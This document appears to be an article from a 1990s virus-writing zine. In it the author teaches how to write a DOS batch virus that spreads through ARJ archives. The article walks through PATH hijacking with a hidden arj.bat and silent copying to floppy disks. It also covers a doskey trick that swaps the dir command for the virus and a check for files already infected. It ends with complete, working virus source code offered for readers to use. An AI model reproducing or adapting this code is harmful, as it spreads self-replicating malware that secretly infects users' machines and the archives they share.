SLAM3.005: ARJ - Batch file infector by Dream Player
SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM
| |
S Dream Player's S
L L
A ARJ - Batch file infector A
M M
| |
SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM-SLAM
Hi guys!
Do you want to have some (quiet) new infection methods?
Here is one.
You know arj?
Did you know that it extracts hidden files?
Did you know that it is easy to get the search paths of dos?
Look at this line:
for %%a in (%path%) do %0 %%a (very important part)
type "set" at the promt and you can see the entries of %path% like this:
C:\WINDOWS;C:\DOS;C:\A86
Because of the ';'s the for-command gives you each entry seperately:
%0(command) C:\WINDOWS
%0 C:\DOS
%0 C:\A86
%0 stands for edit
(Arj will extract the hidden file edit.bat. If the user types edit he starts the virus.)
Because the extension of the file, which is runned by "do %0 %%a", is "bat", the for-command will call edit only one time (with the first search path as parameter).
So.. Why do we need the first path??
Look:
If you install arj you have to make a new entry in your search path.
Like this: (in Autoexec.bat)
path %path%;C:\ARj
or
path C:\WINDOWS;C:\DOS;C:\ARJ
So you can put an arj.bat into C:\WINDOWS (e. g.) and it will be runned in stat of arj.exe in C:\ARJ, because dos searches the first path at first, then the second and so on..
Ok.
The user types "arj a game *.exe" and what will happen?
The virus calles arj.exe do the compressing and will infect the file by adding an edit.bat with the attribute 'hidden'.
Now, if you extract the files of 'game.arj', arj extracts the hidden edit.bat, too. If the user types edit the virus(edit.bat) will install itself in the first search path.
Ok. So far.
(this is harmless!, the idea is not such as new, and now, everyone speaks of macro viruses, I think it's time to say that, too)
Did you know this?
command /f /c copy test.txt a:\
will try to copy test.txt onto a:. But if a: is writeprotected, dos won't ask you for going on.
In combination with 'ctty nul' you can make a batch file that tries to copy itself on a disk and there will be no error.
So you can make a batch-virus that copies itself into the first path(for..) and tries to infect a disk on every edit-command.
Win95 is very helpful:
there you don't need
command /f
try this (it's really funny):
(you should name it edit.bat)
@%0.com %1
@xcopy %0.* %windir%/h>nul
@xcopy %windir%\%0.*/h>nul
Or doskey! (Win95: new option /echo:off|on)
Type:
doskey /e:off dir=virus
Dos won't execute the dir-command, it will call virus and you won't see it.
You want to know if a batch file is already infected by a batch virus?
find "xxmyvirusxx" test.bat>nul
if errorlevel 1 then goto infect....
Ok, I never had to give a batch file another person, and in the internet you can't find many batch files, but using dos commands makes it very easy to write a virus.
Try to understand this arj virus and have fun! (and some new ideas)
(You can also use rar or other packers, even if they don't hide the files, who cares?)
bye bye
Here it is:
@echo off
if (%washere%)==(1) goto next
set washere=1
set params=%1 %2 %3 %4 %5 %6 %7 %8 %9
for %%a in (%path%) do %0 %%a
:next
set firstpath=%1
if %0==arj goto arj
%0.com %params%
if exist %firstpath%\arj.bat goto end
type edit.bat>%firstpath%\arj.bat
attrib +h %firstpath%\arj.bat
type edit.bat>%firstpath%\edit.bat
attrib +h %firstpath%\edit.bat
goto end
:arj
%0.exe %params%
for %%a in (*.arj) do %0.exe a %%a %firstpath%\edit.bat -a -e>nul
:end
echo.
set washere=
set params=
set firstpath=
- Dream Player -
